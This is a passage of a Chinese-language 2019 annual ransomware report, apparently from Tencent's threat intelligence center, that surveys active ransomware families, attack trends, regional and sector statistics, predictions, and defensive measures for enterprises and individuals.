Phorpiex僵尸网络利用网络中的历史泄漏邮箱信息,对千万级别的邮箱发起了诈骗勒索,当命中收件人隐私信息后,利用收件人的恐慌心里,进而成功实施欺诈勒索。勒索过程中,受害者由于担心自己隐私信息遭受进一步的泄漏,极容易陷入勒索者的圈套,从而受骗缴纳赎金。 4.丧心病狂的反复加密,文件名加密 腾讯安全御见威胁情报中心在日常处理勒索病毒的现场发现,有个别系统内同时被多个勒索病毒感染。后来的攻击者在面对文件已被加密的失陷系统,依然将已损坏数据再次加密。导致受害者需缴纳两次赎金,且由于解密测试过程无法单一验证,即使缴纳赎金,数据还原难度也有所提高。 同时还注意到部分勒索病毒并不满足于加密文件,连同文件名也一同进行修改,从侧面反映出勒索病毒运营者也存在竞争激烈,攻击者对赎金的追求已丧心病狂。 5.中文定制化 中国作为拥有8亿多网民的网络应用大国,毫无疑问成为勒索病毒攻击的重要目标,一部分勒索病毒运营者开始在勒索信、暗网服务页面提供中文语言界面。 三、2019年勒索病毒攻击数据盘点 2019年,勒索病毒攻击以1月份攻击次数最多,下半年整体攻击次数较上半年有所下降。但根据腾讯安全威胁情报中心接收到的众多反馈数据,下半年企业遭受勒索病毒攻击的反馈数不减反增,主要原因为部分老牌勒索家族对企业网络的攻击更加精准,致企业遭遇勒索病毒的损失更加严重。 从2019我们接受到的勒索反馈来看,通过加密用户系统内的重要资料文档,数据,再勒索虚拟币实施犯罪仍为当前勒索病毒攻击的的主要形式。使用群发勒索恐吓邮件,命中收件人隐私信息后,再利用收件人的恐慌心里,实施欺诈勒索的方式也较为流行。 加密数据勒索不成以泄漏数据再次胁迫企业的方式也成为了勒索团伙新的盈利模式(Maze和Sodinokibi已使用)。以锁定系统的方式进行勒索多以易语言为代表编写的游戏外挂、辅助工具中。同时也有极少数以勒索攻击为表象,以消除入侵痕迹掩盖真相为目的的攻击事件,该类型的勒索病毒通常出现在部分定向窃密行动中。 观察2019全年勒索病毒感染地域数据可知,国内遭受勒索病毒攻击中,广东,北京,江苏,上海,河北,山东最为严重,其它省份也有遭受到不同程度攻击。传统企业,教育,政府机构遭受攻击最为严重,互联网,医疗,金融,能源紧随其后。 2019全年勒索病毒攻击方式依然以弱口令爆破为主,其次为通过海量的垃圾邮件传播,勾结僵尸网络发起的攻击有上升趋势。勒索病毒也通过高危漏洞,软件供应链形等形式传播。   四、2019年国内勒索病毒活跃TOP榜 观察2019全年勒索病毒活跃度,GlobeImposter家族最为活跃,该病毒在国内传播主要以其12生肖系列,12主神系列为主(加密扩展后缀中包含相关英文,例如:.Zeus865),各政企机构都是其重点攻击目标。 其次为Crysis系列家族,该家族伙同其衍生Phobos系列一同持续活跃,紧随GlobeImposter之后。 GandCrab家族虽然在2019年6月1日宣布停止运营,但在之后短时间内依然有部分余毒扩散,该病毒以出道16个月,非法获利20亿美元结束传播,虽然其2019生命周期只有一半,但其疯狂敛财程度堪称年度之最。 紧随其后的则是被称为GandCrab接班人的Sodinokibi,该病毒在传播手法,作案方式,病毒行为上于GandCrab有许多相似,为2019年勒索病毒中最具威胁的新型家族之一。 Stop家族则寄生于大量的破解软件中,持续攻击加密了国内大量技术人员的工程制图,音频,视频制作材料。老牌勒索家族持续活跃,新的勒索病毒不断涌现。越来越多的不法分子参与到这个黑产行业中来。 GlobeImposter GlobeImposter出现于2017年中,加密文件完成后会留下名为HOW TO BACK YOUR FILES.(txt html exe)类型的勒索说明文件。该病毒加密扩展后缀繁多,其规模使用且感染泛滥的类型有12生肖4444,12生肖/主神666,12生肖/主神865,12生肖/主神865qq等系列,由于该病毒出现至今仍然无有效的解密工具,各政企机构需提高警惕。 Crysis Crysis勒索病毒从2016年开始具有勒索活动 ,加密文件完成后通常会添加“ID+邮箱+指定后缀”格式的扩展后缀,例:“id-编号.[gracey1c6rwhite@aol.com].bip”,其家族衍生Phobos系列变种在今年2月开始也有所活跃。该病毒通常使用弱口令爆破的方式入侵企业服务器,安全意识薄弱的企业由于多台机器使用同一弱密码,面对该病毒极容易引起企业内服务器的大面积感染,进而造成业务系统瘫痪。 GandCrab GandCrab勒索病毒首次出现于2018年1月,是国内首个使用达世币(DASH)作为赎金的勒索病毒,也是2019上半年是最为活跃的病毒之一。该病毒在一年多的时间里经历了5个大版本的迭代,该病毒作者也一直和安全厂商、执法部门斗智斗勇。该病毒在国内擅长使用弱口令爆破,挂马,垃圾邮件等各种方式传播。 2018年10月16日,一位叙利亚用户在推特表示,GandCrab病毒加密了他的电脑文件,因无力支付勒索赎金,他再也无法看到因为战争丧生的小儿子的照片。随后GandCrab放出了叙利亚地区的部分密钥,并在之后的病毒版本中将叙利亚地区列入白名单不再感染,这也是国内有厂商将其命名为“侠盗勒索”的原因。 2019年6月1日,GandCrab运营团队在某俄语论坛公开声明“从出道到现在的16个月内共赚到20多亿美金,平均每人每年入账1.5亿,并成功将这些钱洗白。同时宣布关闭勒索服务,停止运营团队,后续也不会放出用于解密的密钥,往后余生,要挥金如土,风流快活去”。 2019年6月17日,Bitdefender联合罗马尼亚与欧洲多地区警方一起通过线上线下联合打击的方式,实现了对GandCrab最新病毒版本v5.2的解密。该事件也标志着GandCrab勒索团伙故事的终结。 Sodinokibi Sodinokibi勒索病毒首次出现于2019年4月底,由于之后GandCrab停止运营事件,该病毒紧跟其后将GandCrab勒索家族的多个传播渠道纳入自身手中。该病毒目前在国内主要通过web相关漏洞和海量的钓鱼邮件传播,也被国内厂商称为GandCrab的“接班人”,从该病毒传播感染势头来看,毫无疑问是勒索黑产中的一颗上升的新星。 Stop Stop勒索病毒家族在国内主要通过破解软件等工具捆绑进行传播,加密时通常需要下载其它病毒辅助工作模块。Stop勒索病毒使用勒索后缀变化极为频繁,通常勒索980美元,并声称72小时内联系病毒作者将获得50%费用减免,同时,该病毒除加密文件外,还具备以下行为特点。 1.加密时,禁用任务管理器、禁用Windows Defender、关闭Windows Defender的实时监控功能; 2.通过修改hosts文件阻止系统访问全球范围内大量安全厂商的网站; 3.因病毒执行加密时,会造成系统明显卡顿,为掩人耳目,病毒会弹出伪造的Windows 自动更新窗口; 4.释放一个被人为修改后不显示界面的TeamViewer模块,用来实现对目标电脑的远程控制; 5.下载AZORult窃密木马,以窃取用户浏览器、邮箱、多个聊天工具的用户名密码; Paradise Paradise勒索病毒最早出现于2018年7月,该病毒勒索弹窗样式与Crysis极为相似,勒索病毒加密文件完成后将修改文件名为以下格式:[原文件名]_[随机字符串]_{邮箱}.随机后缀,并留下名为Instructions with your files.txt 或###_INFO_you_FILE_###.txt 的勒索说明文档。 Maze Maze(迷宫)勒索病毒也叫ChaCha勒索病毒,擅长使用Fallout EK漏洞利用工具通过网页挂马等方式传播。被挂马的网页,多见于黄赌毒相关页面,通常会逐步扩大到盗版软件、游戏外挂(或破解)、盗版影视作品下载,以及某些软件内嵌的广告页面,该病毒的特点之一是称根据染毒机器的价值来确认勒索所需的具体金额,该勒索病毒同时也是将数据加密勒索转向数据泄露的先行者。 Nemty NEMTY勒索病毒出现于今年8月,该病毒早期版本加密文件完成后会添加NEMTY扩展后缀,也因此得名。NEMTY 变种病毒加密文件完成后会添加“._NEMTY_random_7个随机字符”扩展名后缀,由于该病毒与Phorpiex僵尸网络合作,在2019年国庆期间感染量有一次爆发增长,该病毒会避开感染俄罗斯、白俄罗斯、乌克兰及多个中亚国家。 Medusalocker Medusalocker该病毒出现于2019年10月,已知该病毒主要通过钓鱼欺诈邮件及托口令爆破传播。该病毒早期版本加密文件完成后添加扩展后缀.encrypted,最新传播病毒版本加密文件后添加.ReadTheInstructions扩展后缀。攻击者会向受害者勒索1BTC(比特币),市值约6.5万元。 Ryuk Ryuk的特点之一是倾向于攻击数据价值较高的政企机构,且赎金普遍极高(最近联系作者要价11个比特币,价值约75万元RMB,在国外该病毒开出的赎金额度通常高达数百万RMB),Ryuk勒索家族起源于Hermes家族,最早的活跃迹象可追溯到2018年8月,国内发现该病毒的投递与Emotet僵尸网络有着密不可分的关系。 五、勒索病毒接下来会怎样 1、勒索病毒与安全软件的对抗加剧 随着安全软件对勒索病毒的解决方案成熟完善,勒索病毒更加难以成功入侵用户电脑,病毒传播者会不断升级对抗技术方案。 2、勒索病毒传播场景多样化 过去勒索病毒传播主要以钓鱼邮件为主,现在勒索病毒更多利用了高危漏洞、鱼叉式攻击,或水坑攻击等方式传播,乃至通过软件供应链传播,都大大提高了入侵成功率。 3、勒索病毒攻击目标转向企业用户 个人电脑大多能够使用安全软件完成漏洞修补,在遭遇勒索病毒攻击时,个人用户往往会放弃数据,恢复系统。而企业用户在没有及时备份的情况下,会倾向于支付赎金,挽回数据。因此,已发现越来越多攻击目标是政府机关、企业、医院、学校。 4、勒索病毒更新迭代加快 随着安全厂商与警方的不断努力,越来越多的勒索病毒将会被破解,被打击,这也将加剧黑产从业者对病毒进行更新迭代。 5、勒索赎金定制化,赎金进一步提高 随着用户安全意识提高、安全软件防御能力提升,勒索病毒入侵成本越来越高,攻击者更偏向于向不同企业开出不同价格的勒索赎金,定制化的赎金方案能有效提升勒索成功率,直接提升勒索收益。如某公司被勒索病毒入侵后,竟被勒索9.5个比特币,还有Ryuk团伙动辄开出上百万的勒索赎金单,都代表勒索病毒赎金未来会有进一步的提高。 6、勒索病毒开发门槛降低 观察近期勒索病毒开发语言类型可知,越来越多基于脚本语言开发出的勒索病毒开始涌现,甚至开始出现使用中文编程“易语言”开发的勒索病毒。 例如使用Python系列的“Py-Locker”勒索病毒,易语言供应链传播闹的沸沸扬扬的“unname1989”勒索病毒,甚至利用bat脚本结合Winrar相关模块直接对文件进行压缩包密码加密的“FakeGlobeimposter”病毒等,门槛低意味着将有更多的黑产人群进入勒索产业这个领域,也意味着该病毒将持续发展泛滥。 7、勒索病毒产业化加剧 随着勒索病毒的不断涌现,腾讯安全御见威胁情报中心观察到勒索代理同样繁荣。当企业遭遇勒索病毒攻击,关键业务数据被加密,而理论上根本无法解密时,勒索代理机构,承接了受害者和攻击者之间谈判交易恢复数据的业务。我们注意到勒索代理机构常年购买搜索关键字广告承接生意。 8、勒索病毒多平台扩散 目前受到的勒索病毒攻击主要是windows系统,但是管家也陆续发现了MacOS、Android等平台的勒索病毒,随着windows的防范措施完善和攻击者永不满足的贪欲,未来勒索病毒在其他平台的影响力也会逐步增大。 9、勒索病毒黑产参与者持续上升,勒索病毒影响规模进一步扩大 GandCrab通过16个月赚够20亿美金高调“退休”的故事被广为流传,可以预见,此事件将引爆黑暗中更多人的贪欲,在未来相当长一段时间内,将会有越来越多的人投身勒索行业,黑产从业者将持续上升。 随着各类型病毒木马盈利模式一致,各类型病毒均有可能随时附加勒索属性。蠕虫,感染,僵尸网络,挖矿木马,在充分榨干感染目标剩余价值后,都极有可能下发勒索模块进行最后一步敲诈,2019年老的勒索家族持续活跃,新的勒索病毒也层出不穷,可预测未来由勒索病毒导致的网络攻击将依然是企业安全面临的重要问题之一。 六、勒索病毒防范措施 企业用户可参考以下措施加强防御 A、定期进行安全培训,日常安全管理可参考“三不三要”思路 1.不上钩:标题吸引人的未知邮件不要点开 2.不打开:不随便打开电子邮件附件 3.不点击:不随意点击电子邮件中附带网址 4.要备份:重要资料要备份 5.要确认:开启电子邮件前确认发件人可信 6.要更新:系统补丁/安全软件病毒库保持实时更新 B、全网安装专业的终端安全管理软件,由管理员批量杀毒和安装补丁,后续定期更新各类系统高危补丁。 C、部署流量监控/阻断类设备/软件,便于事前发现,事中阻断和事后回溯。 D、建议由于其他原因不能及时安装补丁的系统,考虑在网络边界、路由器、防火墙上设置严格的访问控制策略,以保证网络的动态安全。 E、使用内网强制密码安全策略来避免使用简单密码。 1.一些关键服务,应加强口令强度,同时需使用加密传输方式,对于一些可关闭的服务来说,建议关闭不要的服务端口以达到安全目的。不使用相同口令管理多台关键服务器。 2.建议对数据库账户密码策略建议进行配置,对最大错误登录次数、超过有效次数进行锁定、密码有效期、到期后的宽限时间、密码重用等策略进行加固设置。 F、建议网络管理员、系统管理员、安全管理员关注安全信息、安全动态及最新的严重漏洞,攻与防的循环,伴随每个主流操作系统、应用服务的生命周期。 G、建议对数据库的管理访问节点地址进行严格限制,只允许特定管理主机IP进行远程登录数据库。 H、做好安全灾备方案,可按数据备份三二一原则来指导实施 1.至少准备三份:重要数据备份两份 2.两种不同形式:将数据备份在两种不同的存储类型,如服务器/移动硬盘/云端/光盘等 3.一份异地备份:至少一份备份存储在异地,当发生意外时保证有一份备份数据安全。 个人消费者可使用安全防护软件 腾讯电脑管家可对各勒索病毒家族变种及时防御拦截,同时管家文档守护者通过集成多个主流勒索家族的解密方案,通过完善的数据备份防护方案,在2019中为数千万的管家用户提供文档保护恢复服务。通过自研解密方案成功为上千名不幸感染勒索病毒者提供了解密服务,帮助其成功恢复了被病毒加密的文件。